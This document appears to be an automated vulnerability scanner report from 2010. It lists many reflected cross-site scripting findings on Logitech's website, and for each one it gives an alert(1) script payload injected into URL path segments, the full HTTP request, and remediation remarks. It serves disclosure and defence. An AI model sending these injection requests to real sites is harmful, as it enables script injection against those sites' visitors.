Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us2edec"%3b023c0efe40d/webcam-communications HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c99d6"><script>alert(1)</script>60b22e2d950 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usc99d6"><script>alert(1)</script>60b22e2d950/webcam-communications HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c933</script><script>alert(1)</script>5d06a58e88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1c933</script><script>alert(1)</script>5d06a58e88/webcam-communications HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 947fd"><script>alert(1)</script>4a9c55058bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications947fd"><script>alert(1)</script>4a9c55058bf HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 510ac</script><script>alert(1)</script>35e40bdaa00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications510ac</script><script>alert(1)</script>35e40bdaa00 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 393aa</script><script>alert(1)</script>9d747401ef5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /393aa</script><script>alert(1)</script>9d747401ef5/webcam-communications&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 149ba"%3b1e69cf9db8e was submitted in the REST URL parameter 1. This input was echoed as 149ba";1e69cf9db8e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us149ba"%3b1e69cf9db8e/webcam-communications&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4139"><script>alert(1)</script>43aa44ebdfe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usd4139"><script>alert(1)</script>43aa44ebdfe/webcam-communications&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 893ab</script><script>alert(1)</script>96851cc46e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications893ab</script><script>alert(1)</script>96851cc46e5&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cee50"><script>alert(1)</script>1fa1550cabc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communicationscee50"><script>alert(1)</script>1fa1550cabc&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b274c</script><script>alert(1)</script>4022c8e0fb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /b274c</script><script>alert(1)</script>4022c8e0fb5/webcam-communications/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115dd"><script>alert(1)</script>b29374d3064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us115dd"><script>alert(1)</script>b29374d3064/webcam-communications/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51372"%3bd767436f949 was submitted in the REST URL parameter 1. This input was echoed as 51372";d767436f949 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us51372"%3bd767436f949/webcam-communications/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d171b"><script>alert(1)</script>abdd39ea7ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/webcam-communicationsd171b"><script>alert(1)</script>abdd39ea7ba/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 601d4</script><script>alert(1)</script>f58632281a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications601d4</script><script>alert(1)</script>f58632281a3/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2215</script><script>alert(1)</script>7e9ea6f86df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f2215</script><script>alert(1)</script>7e9ea6f86df/webcam-communications/internet-headsets-phones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3edab"><script>alert(1)</script>e047b89ce24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us3edab"><script>alert(1)</script>e047b89ce24/webcam-communications/internet-headsets-phones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb1ac</script><script>alert(1)</script>b2cfc7f915e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communicationsfb1ac</script><script>alert(1)</script>b2cfc7f915e/internet-headsets-phones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b64c"><script>alert(1)</script>aa9f160d795 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications5b64c"><script>alert(1)</script>aa9f160d795/internet-headsets-phones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80cb4</script><script>alert(1)</script>d61623d41f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/internet-headsets-phones80cb4</script><script>alert(1)</script>d61623d41f1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e4ba"><script>alert(1)</script>d4b0a6dea3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/internet-headsets-phones7e4ba"><script>alert(1)</script>d4b0a6dea3c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db594"><script>alert(1)</script>675b2e45b35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usdb594"><script>alert(1)</script>675b2e45b35/webcam-communications/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45eac</script><script>alert(1)</script>64023df6f89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /45eac</script><script>alert(1)</script>64023df6f89/webcam-communications/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbb3c</script><script>alert(1)</script>0aa8626302e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communicationsbbb3c</script><script>alert(1)</script>0aa8626302e/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fffe6"><script>alert(1)</script>2284f863048 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communicationsfffe6"><script>alert(1)</script>2284f863048/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fac1d</script><script>alert(1)</script>0e01ac7c35b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/microphonesfac1d</script><script>alert(1)</script>0e01ac7c35b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 620b6"><script>alert(1)</script>a35f27d2893 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/microphones620b6"><script>alert(1)</script>a35f27d2893 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7572c"><script>alert(1)</script>08d0179d27f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us7572c"><script>alert(1)</script>08d0179d27f/webcam-communications/video-security-systems/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:52 GMT Connection: close
